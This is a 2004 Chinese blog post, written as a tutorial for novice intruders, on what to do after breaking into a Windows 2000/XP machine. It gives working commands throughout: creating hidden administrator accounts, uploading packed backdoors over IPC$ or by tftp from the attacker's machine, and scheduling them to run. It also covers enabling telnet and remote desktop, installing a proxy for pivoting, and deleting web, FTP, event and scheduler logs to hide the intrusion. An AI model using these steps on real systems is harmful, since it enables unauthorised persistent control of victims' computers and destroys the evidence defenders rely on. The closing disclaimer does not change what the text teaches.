CSDN博客

img heiyeshuwu
博客专家

入侵系统后的工作

发表于2004/10/14 14:57:00  2505人阅读

                                   入侵系统后的工作
                                           ◇文/heiyeluren


我们知道入侵一个系统有时候比较的简单,但是如果要把入侵后的工作做好,不是那么容易的,有句话不是说"打江山容易,守江山难"嘛,所以入侵一个系统后的工作是很重要,并且需要仔细细致的去做.本文从这个角度出发来告诉那些菜菜们假如你获得一个系统的权限后怎么做剩下的工作,希望对他们有一些帮助.
说明:(本文所提到的系统如果没有特别说明都是指windows2000/windowsXP系统)

一.获得权限(不在讨论的范围,我们只讨论入侵系统后的该做的事情)


二.建立超级权限用户
(1)建立用户:
如:net user system$ hacker /add
net localgroup administrators system$ /add
说明:上面的两个命令就是建立一个名字叫"system$",密码为"hacker"的超级权限用户
(2) 克隆超级用户:
可以使用CA工具来实现超级用户的可隆了,前提是只要拥有目标系统的管理员权限得帐号和密码.
ca //ip administrator password IUSR_name password
说明: administrator--管理员帐号  password--管理员帐号的密码   
IUSR_name--系统已经存在的较低权限的用户  password--克隆用户的密码
cca:检查克隆结果的工具.
cca //ip user password
user:被克隆的帐号
password:密码


三.建立后门
(1)上传后门程序(方法较多,只说常用的两种):
上传后门比如wollf,winshell等常用的后门,最好把后门加一个壳,比如用UPX或者是ASPack等加壳,就不容易被病毒防火墙给查杀.

把后门上传的方法:
(a)使用IPC$: 先和对方建立一个连接: 
 net use //对方IP地址/ipc$ "密码" /user:"用户名"
建立成功后就可以上传后门:
 copy c:/hack/wollf.exe //IP/admin$
 说明:把你C盘下的wollf后门传到对方的x:/winnt下,或者是windows目录下
(b)使用tftp:  前提是你进入了对方的系统,比如你通过telnet进入了对方系统,就
可以在对方的shell下从你的机器中传后门到对方的系统:
  tftp -i  你的IP get wollf.exe
说明:把你机器中的wollf.exe下载到对方的系统目录下,前提是对方没有禁止tftp并且你有独立的IP地址(局域网的机器不行),你自己的机器打开tftpd32这个ftp工具,它就会监听你的69端口的连接,然后你就可以在对方的机器上来下载你机器的东西.

 (2)运行后门: 
(a)使用AT命令:  
先获得对方系统的时间: net time //对方的IP
的到对方的时间后就使用AT命令: at //对方IP 后门运行的时间 后门所在对方系统的路径
例: at //192.168.0.1 11:02 c:/winnt/system32/wollf.exe
注意:你要执行AT命令,前提是你与对方建立了IPC$连接,并且你获得对方系统的时间后,你运行后门的时    间必须要后几分钟.除了可以使用AT命令之后,还可以使用一款工具叫psexec.exe来实现AT的功能.
(b)使用"流光"的"种植者"来实现拷备和运行后门,这个方法你可以参考"流光"的帮助文件
(c)直接运行后门:
你比如登陆了对方的系统,比如你使用Telnet进入了对方的系统后就可以直接运行了.
假如对方没有开Telnet,那么我们就可以帮它打开.  
打开对方的Telnet的方法:
我们可以使用opentelnet.exe这个工具来实现,前提是必须具有目标系统的管理员权限和开了IPC$,
命令如下:
opentelnet //ip username password NTLMauthor Telnetport
说明: //ip--目标IP  username--用户名   password--密码
NTLMauthor--NTLM的验证方式   Telnetport--端口
验证方式有:0:代表不使用NTLM验证 1:代表先尝试使用NTLM验证,失败后用密码验证 2:只使用NTLM验证
执行成功后,就可以使用Telnet 对方IP 端口 或者 nc -vv 对方的IP 端口 来登陆目标机器了.


四.做代理服务器
为什么要做代理我就不用说了吧,我们就说说怎么做代理吧.
这里我们用到一个工具skserver.exe,是snake写的一个代理工具,做跳板不错!
先写好一个批处理,内容如下:
@echo ***********************************************
@echo            安装socket代理的批处理
@echo                by heiyeluren
@echo      CQSN---http://www.hackerxfiles.com/
@echo ***********************************************
@pause
@skserver -install
@echo Install...  Succeed!
@skserver -config port 1983
@echo Set port in 1983... Succeed!
@skserver -config starttype 2
@echo Set starttype is autostart... Succeed!
@net start skserver
@echo Start service... Succeed!
@echo OK... Install End!
@pause
@exit

以上的批处理你可以自己根据情况更改,其中的skserver可以改成你该成后门的名字,不过下面"net start skserver"不能改,这是该工具默认的服务名,端口你也可以改成你需要的.把skserver.exe传到对方的系统后,再运行该批处理,就可以从对方1983端口来连接代理,可以通过sockCap来做代理服务器,最多可以跳254级看谁能找到你,呵呵呵~~~


五.开超级终端
如果对方是win2000 server以上的系统的话,就可以打开对方的超级终端来尽心更好的远程控制,大家都说开3389肉鸡是极品嘛,现在我们就来试试!~~

(1)手工开终端:
进入目标系统后,在命令提示符下面输入下面的内容: (假设系统在C:/winnt下面)
echo [Components] > c:/3389
echo TSEnable = on >> c:/3389
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/3389 /q 
(可以在加上参数/r,可以抑制重新启动,不加安装完后就重启)或者你可以写好这个文件,然后传到对方的系统下:
[Components]
TSEnable = on
保存为3389文件,然后运行sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/3389 /q 这个命令,对方重启后你  就拥有了一个3389的肉鸡啦,就可以通过"远程桌面连接"来连接对方,从windows下控制对方了.

(2)利用工具:
这里用到一款叫Dixyxs.exe的小工具来开对方的终端.
把该工具上传到对方的系统中,然后执行该程序:dixyxs.exe后等一会肉鸡会自动重启,重启后会出现终端服务


六.清除日志
当你做了这一切之后,那么你不想三分钟被查到吧?那么就应该清除日志.
windows的日志有:www日志,FTP日志,DNS日志,安全日志,系统日志,应用程序日志等等.

(1)手工清除日志:
有些日志是一定要删除的,比如web,ftp等日志.

日志文件默认位置: 
应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%/system32 
/config,默认文件大小512KB,管理员都会改变这个默认大小。 
安全日志文件:%systemroot%/system32/config/SecEvent.EVT 
系统日志文件:%systemroot%/system32/config/SysEvent.EVT 
应用程序日志文件:%systemroot%/system32/config/AppEvent.EVT 
IIS的FTP日志默认位置:%systemroot%/system32/logfiles/msftpsvc1/,默认每天一个日志 
IIS的WWW日志默认位置:%systemroot%/system32/logfiles/w3svc1/,默认每天一个日志 
Scheduler服务日志默认位置:%systemroot%/schedlgu.txt 

我们把相关的服务停止后就可以删除了:
停止服务: net stop w3svc
然后几可以删除日志,www服务的日志是在:c:/winnt/system32/LogFiles/W3SVC1目录下;FTP服务的日志在c:/winnt/system32/LogFiles/MSFTPSVC1目录下.然后就可以使用del了:
del c:/winnt/system32/LogFiles/W3SVC1/*.* /q
del c:/winnt/system32/LogFiles/MSFTPSVC1/*.* /q
然后是Scheduler日志,停止该服务: net stop "task scheduler"
然后del c:/winnt/schedlgu.txt /q就可以了~

像安全日志,系统日志,应用程序日志等关联的服务是Eventlog,该服务是无法停止的,所以如果我们手工删除这些日志的话,就要通过一个很慢的方法:
打开“控制面板”的"管理工具"中的"事件查看器"在菜单的"操作"项有一个名为"连接到另一台计算机"的菜单,点击它如下图所示:输入远程计算机的IP,然后等上一段时间(根据双方的网速),然后打开对方的计算机的"事件查看器":选择远程计算机的"安全性"日志,右键选择它的属性:点击属性里的"清除日志"按钮,OK!安全日志清除完毕!同样的方法清除"系统"日志和"应用程序"日志! 

(2)利用工具删除日志
利用工具来删除那些日志就简单多啦!
(A)删除IIS服务相关的WWW日志和FTP日志可以使用CleanIISLog.exe这个小工具.
用法:
先用ipc$管道进行连接:net use //ip/ipc$ "password" /user:""
然后就可以使用下面的命令:
cleaniislog [logfile]|[.] [cleanIP]|.
说明: 清除的日志文件,.代表所有    清除的日志中哪个IP地址的记录,.代表所有IP记录
举例:cleaniislog . 127.0.0.1
a.可以清除指定的的IP连接记录,保留其他IP记录。
b.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog <LogFile>|<.> <CleanIP>|<.>
<LogFile>: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。
<CleanIP>: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。

(B)删除安全日志,系统日志和应用程序日志,可以使用elsave.exe这个小工具.
使用方法:
先用ipc$管道进行连接:net use //ip/ipc$ "password" /user:""
清除目标系统的应用程序日志:
elsave -s //ip -l "application" -C
清除目标系统的系统日志:
elsave -s //ip -l "system"" -C
清除目标系统的安全日志:
elsave -s //ip -l "security" -C

(C)logkiller.exe这个工具可以把对方的所有日志都删除,包括"应用程序日志","安全日志"和"系统日志",IIS的FTP服务,IIS的SMTP服务日志和IIS的WWW服务日志,以及计划任务日志等日志.
使用方法:把该工具上传到对方的系统中后直接运行.
例: c:/winnt/system32/logkiller.exe


七.后面的话

说到这里,差不多入侵一个系统后该做的工作都差不多了吧.当然,你要做别的工作也是可以的,不是限定非要按照上面的模式的,只不过上面的是一个比较基本常用的模式. 比如你还可以设置VNC等远程控制软件或者把肉鸡做成你的FTP服务器等都是可以的,但是前提是你一定要注意安全,不要留下不必要的痕迹.
不知道大家有没有发现一个情况,就是我们都是使用各式各样的工具来完成我们的任务的,这样不誓不罢休好,但是使用了太多的工具的话,对我们的技术并没有太大的进步,所以希望大家能够不使用工具就不要使用,比如可以使用手工的就尽量用手工来做,这样的话你会"知其然,更知所以然",不是很好?
我这篇文章可能讲的都是一些比较老的东西了,可能很多高手都不愿意看,呵呵呵,我想这个定位是在菜菜级的吧,让大家能够不至于在这些小问题上迷惑不解.


声明: 以上纯属讨论技术,如果任何组织或个人利用以上方法违反国家法律,都将受到刑律的制裁,同时该组织或个人的一切行为跟作者以及作者所在的组织无关.

《本文完》

阅读全文
0 0

相关文章推荐

img
取 消
img